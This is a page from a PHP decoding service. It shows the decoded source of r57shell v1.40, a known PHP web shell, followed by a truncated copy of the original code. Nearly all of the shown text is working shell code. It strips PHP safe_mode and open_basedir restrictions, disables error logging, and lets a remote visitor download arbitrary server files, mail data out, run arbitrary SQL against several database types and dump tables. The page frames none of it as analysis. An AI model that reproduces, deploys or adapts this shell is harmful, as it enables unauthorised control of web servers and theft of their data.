Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? //error_reporting(0); $language="eng"; $auth = 0; //These seem to be hashes o..
Decoded Output download
<?
//error_reporting(0);
$language="eng";
$auth = 0;
//These seem to be hashes of the same thing.
$name="8cd59f852a590eb0565c98356ecb0b84";
$pass="8cd59f852a590eb0565c98356ecb0b84";
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){
$open_basedir=1;
} else{
$open_basedir=0;
}
define("starttime",@getmicrotime());
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
//<--- The following was commented out, but let's assume it vould have somehow worked...
if(@function_exists('ini_get')){
$safe_mode = @ini_get('safe_mode');
}else{
$safe_mode=1;
}
$version = '1.40';
if(@version_compare(@phpversion(), '4.1.0') == -1) {
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc()) {
foreach ($_POST as $k=>$v) {
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v) {
$_COOKIE[$k] = stripslashes($v);
}
}
}
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) {
header('WWW-Authenticate: Basic realm="HELLO!"');
header('HTTP/1.0 401 Unauthorized');
exit("<b>Access Denied</b>");
}
}
$head = '<html><head><title>r57shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><STYLE>tr {BORDER-RIGHT: #aaaaaa 1px solid;BORDER-TOP: #eeeeee 1px solid;BORDER-LEFT: #eeeeee 1px solid;BORDER-BOTTOM: #aaaaaa 1px solid;color: #000000;}td {BORDER-RIGHT: #aaaaaa 1px solid;BORDER-TOP: #eeeeee 1px solid;BORDER-LEFT: #eeeeee 1px solid;BORDER-BOTTOM: #aaaaaa 1px solid;color: #000000;}.table1 {BORDER: 0px;BACKGROUND-COLOR: #D4D0C8;color: #000000;}.td1 {BORDER: 0px;font: 7pt Verdana;color: #000000;}.tr1 {BORDER: 0px;color: #000000;}table {BORDER: #eeeeee 1px outset;BACKGROUND-COLOR: #D4D0C8;color: #000000;}input {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #e4e0d8;font: 8pt Verdana;color: #000000;}select {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #e4e0d8;font: 8pt Verdana;color: #000000;;}submit {BORDER: buttonhighlight 2px outset;BACKGROUND-COLOR: #e4e0d8;width: 30%;color: #000000;}textarea {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #e4e0d8;font: Fixedsys bold;color: #000000;}BODY {margin: 1px;color: #000000;background-color: #e4e0d8;}A:link {COLOR:red; TEXT-DECORATION: none}A:visited { COLOR:red; TEXT-DECORATION: none}A:active {COLOR:red; TEXT-DECORATION: none}A:hover {color:blue;TEXT-DECORATION: none}</STYLE><script language=\'javascript\'>function hide_div(id){ document.getElementById(id).style.display = \'none\'; document.cookie=id+\'=0;\';}function show_div(id){ document.getElementById(id).style.display = \'block\'; document.cookie=id+\'=1;\';}function change_divst(id){ if (document.getElementById(id).style.display == \'none\') show_div(id); else hide_div(id);}</script>';
class zipfile{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "PK\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0) {
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "PK\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "PK\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file(){
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress){
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress')){
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
} else if ($compress == 'gzip' && @function_exists('gzencode')){
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
} else if ($compress == 'zip' && @function_exists('gzcompress')){
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
} else {
$mime_type = 'application/octet-stream';
}
}
function moreread($temp){
global $lang,$language;$str='';
if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){
$ffile = @fopen($temp, "r");
while(!@feof($ffile)){
$str .= @fgets($ffile);
}
fclose($ffile);
} elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){
$ffile = @fopen($temp, "r");
$str = @fread($ffile, @filesize($temp));
@fclose($ffile);
} elseif(@function_exists('file')){
$ffiles = @file ($temp);
foreach ($ffiles as $ffile) {
$str .= $ffile;
}
} elseif(@function_exists('file_get_contents')){
$str = @file_get_contents($temp);
} elseif(@function_exists('readfile')){
$str = @readfile($temp);
} else {
echo $lang[$language.'_text56'];
}
return $str;
}
function readzlib($filename,$temp=''){
global $lang,$language;$str='';
if(!$temp){
$temp=tempnam(@getcwd(), "copytemp");
}
if(@copy("compress.zlib://".$filename, $temp)){
$str = moreread($temp);
} else
echo $lang[$language.'_text119'];
@unlink($temp);
return $str;
}
function mailattach($to,$from,$subj,$attach) {
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(mail($to,$subj,"",$headers)) {
return 1;
}
return 0;
}
class my_sql {
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect(){
switch($this->db){
case 'MySQL':
if(empty($this->port)) {
$this->port = '3306';
}
if(!@function_exists('mysql_connect'))
return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection))
return 1;
break;
case 'MSSQL':
if(empty($this->port)) {
$this->port = '1433';
}
if(!@function_exists('mssql_connect'))
return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection)
return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) {
$this->port = '5432';
}
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!@function_exists('pg_connect'))
return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection))
return 1;
break;
case 'Oracle':
if(!@function_exists('ocilogon'))
return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection))
return 1;
break;
}
return 0;
}
function select_db() {
switch($this->db) {
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection))
return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection))
return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
}
return 0;
}
function query($query){
$this->res=$this->error='';
switch($this->db){
case 'MySQL':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))){
$this->error = @mysql_error($this->connection);
return 0;
} else if(is_resource($this->res)) {
return 1;
}
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection))){
$this->error = 'Query error';
return 0;
} else if(@mssql_num_rows($this->res) > 0) {
return 1;
}
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query))){
$this->error = @pg_last_error($this->connection);
return 0;
} else if(@pg_num_rows($this->res) > 0) {
return 1;
}
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query))){
$this->error = 'Query parse error';
} else {
if(@ociexecute($this->res)){
if(@ocirowcount($this->res) != 0)
return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
}
return 0;
}
function get_result(){
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db){
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res)))
$this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
}
return 0;
}
function dump($table) {
if(empty($table))
return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db){
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1)
return 0;
if(!$this->get_result())
return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1)
return 0;
if(!$this->get_result())
return 0;
for($i=0;$i<$this->num_rows;$i++){
foreach($this->rows[$i] as $k=>$v){
$this->rows[$i][$k] = @mysql_real_escape_string($v);
}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1)
return 0;
if(!$this->get_result())
return 0;
for($i=0;$i<$this->num_rows;$i++)
foreach($this->rows[$i] as $k=>$v) {
$this->rows[$i][$k] = @addslashes($v);
}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1)
return 0;
if(!$this->get_result())
return 0;
for($i=0;$i<$this->num_rows;$i++) {
foreach($this->rows[$i] as $k=>$v) {
$this->rows[$i][$k] = @addslashes($v);
}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
$this->dump[] = '## under construction';
break;
default:
return 0;
break;
}
return 1;
}
function close() {
switch($this->db) {
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
}
}
function affected_rows() {
switch($this->db) {
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
default:
return 0;
break;
}
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) {
if($file=@fopen($_POST['d_name'],"r")){
$filedump = @fread($file,@filesize($_POST['d_name']));
@fclose($file);
} else if ($file=readzlib($_POST['d_name'])) {
$filedump = $file;
} else {
err(1,$_POST['d_name']);
$_POST['cmd']="";
}
if(isset($_POST['cmd'])) {
@ob_clean();
$filename = @basename($_POST['d_name']);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) {
header('Content-Encoding: ' . $content_encoding);
}
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['phpinfo'])) {
echo @phpinfo();
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query") {
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=#e4e0d8>';
if(!$sql->connect())
echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
else {
if(!empty($sql->base)&&!$sql->select_db())
echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
else {
foreach($querys as $num=>$query) {
if(strlen($query)>5) {
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql->query($query)) {
case '0':
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result()) {
echo "<table width=100%>";
foreach($sql->columns as $k=>$v)
$sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++) {
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."
?>
// --->
Did this file decode correctly?
Original Code
<?
//error_reporting(0);
$language="eng";
$auth = 0;
//These seem to be hashes of the same thing.
$name="8cd59f852a590eb0565c98356ecb0b84";
$pass="8cd59f852a590eb0565c98356ecb0b84";
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){
$open_basedir=1;
} else{
$open_basedir=0;
}
define("starttime",@getmicrotime());
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
//<--- The following was commented out, but let's assume it vould have somehow worked...
if(@function_exists('ini_get')){
$safe_mode = @ini_get('safe_mode');
}else{
$safe_mode=1;
}
$version = '1.40';
if(@version_compare(@phpversion(), '4.1.0') == -1) {
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc()) {
foreach ($_POST as $k=>$v) {
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v) {
$_COOKIE[$k] = stripslashes($v);
}
}
}
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) {
header('WWW-Authenticate: Basic realm="HELLO!"');
header('HTTP/1.0 401 Unauthorized');
exit("<b>Access Denied</b>");
}
}
$head = '<html><head><title>r57shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><STYLE>tr {BORDER-RIGHT: #aaaaaa 1px solid;BORDER-TOP: #eeeeee 1px solid;BORDER-LEFT: #eeeeee 1px solid;BORDER-BOTTOM: #aaaaaa 1px solid;color: #000000;}td {BORDER-RIGHT: #aaaaaa 1px solid;BORDER-TOP: #eeeeee 1px solid;BORDER-LEFT: #eeeeee 1px solid;BORDER-BOTTOM: #aaaaaa 1px solid;color: #000000;}.table1 {BORDER: 0px;BACKGROUND-COLOR: #D4D0C8;color: #000000;}.td1 {BORDER: 0px;font: 7pt Verdana;color: #000000;}.tr1 {BORDER: 0px;color: #000000;}table {BORDER: #eeeeee 1px outset;BACKGROUND-COLOR: #D4D0C8;color: #000000;}input {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #e4e0d8;font: 8pt Verdana;color: #000000;}select {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #e4e0d8;font: 8pt Verdana;color: #000000;;}submit {BORDER: buttonhighlight 2px outset;BACKGROUND-COLOR: #e4e0d8;width: 30%;color: #000000;}textarea {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #e4e0d8;font: Fixedsys bold;color: #000000;}BODY {margin: 1px;color: #000000;background-color: #e4e0d8;}A:link {COLOR:red; TEXT-DECORATION: none}A:visited { COLOR:red; TEXT-DECORATION: none}A:active {COLOR:red; TEXT-DECORATION: none}A:hover {color:blue;TEXT-DECORATION: none}</STYLE><script language=\'javascript\'>function hide_div(id){ document.getElementById(id).style.display = \'none\'; document.cookie=id+\'=0;\';}function show_div(id){ document.getElementById(id).style.display = \'block\'; document.cookie=id+\'=1;\';}function change_divst(id){ if (document.getElementById(id).style.display == \'none\') show_div(id); else hide_div(id);}</script>';
class zipfile{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0) {
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file(){
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress){
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress')){
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
} else if ($compress == 'gzip' && @function_exists('gzencode')){
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
} else if ($compress == 'zip' && @function_exists('gzcompress')){
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
} else {
$mime_type = 'application/octet-stream';
}
}
function moreread($temp){
global $lang,$language;$str='';
if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){
$ffile = @fopen($temp, "r");
while(!@feof($ffile)){
$str .= @fgets($ffile);
}
fclose($ffile);
} elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){
$ffile = @fopen($temp, "r");
$str = @fread($ffile, @filesize($temp));
@fclose($ffile);
} elseif(@function_exists('file')){
$ffiles = @file ($temp);
foreach ($ffiles as $ffile) {
$str .= $ffile;
}
} elseif(@function_exists('file_get_contents')){
$str = @file_get_contents($temp);
} elseif(@function_exists('readfile')){
$str = @readfile($temp);
} else {
echo $lang[$language.'_text56'];
}
return $str;
}
function readzlib($filename,$temp=''){
global $lang,$language;$str='';
if(!$temp){
$temp=tempnam(@getcwd(), "copytemp");
}
if(@copy("compress.zlib://".$filename, $temp)){
$str = moreread($temp);
} else
echo $lang[$language.'_text119'];
@unlink($temp);
return $str;
}
function mailattach($to,$from,$subj,$attach) {
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(mail($to,$subj,"",$headers)) {
return 1;
}
return 0;
}
class my_sql {
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect(){
switch($this->db){
case 'MySQL':
if(empty($this->port)) {
$this->port = '3306';
}
if(!@function_exists('mysql_connect'))
return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection))
return 1;
break;
case 'MSSQL':
if(empty($this->port)) {
$this->port = '1433';
}
if(!@function_exists('mssql_connect'))
return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection)
return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) {
$this->port = '5432';
}
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!@function_exists('pg_connect'))
return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection))
return 1;
break;
case 'Oracle':
if(!@function_exists('ocilogon'))
return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection))
return 1;
break;
}
return 0;
}
function select_db() {
switch($this->db) {
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection))
return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection))
return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
}
return 0;
}
function query($query){
$this->res=$this->error='';
switch($this->db){
case 'MySQL':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))){
$this->error = @mysql_error($this->connection);
return 0;
} else if(is_resource($this->res)) {
return 1;
}
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection))){
$this->error = 'Query error';
return 0;
} else if(@mssql_num_rows($this->res) > 0) {
return 1;
}
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query))){
$this->error = @pg_last_error($this->connection);
return 0;
} else if(@pg_num_rows($this->res) > 0) {
return 1;
}
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query))){
$this->error = 'Query parse error';
} else {
if(@ociexecute($this->res)){
if(@ocirowcount($this->res) != 0)
return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
}
return 0;
}
function get_result(){
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db){
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
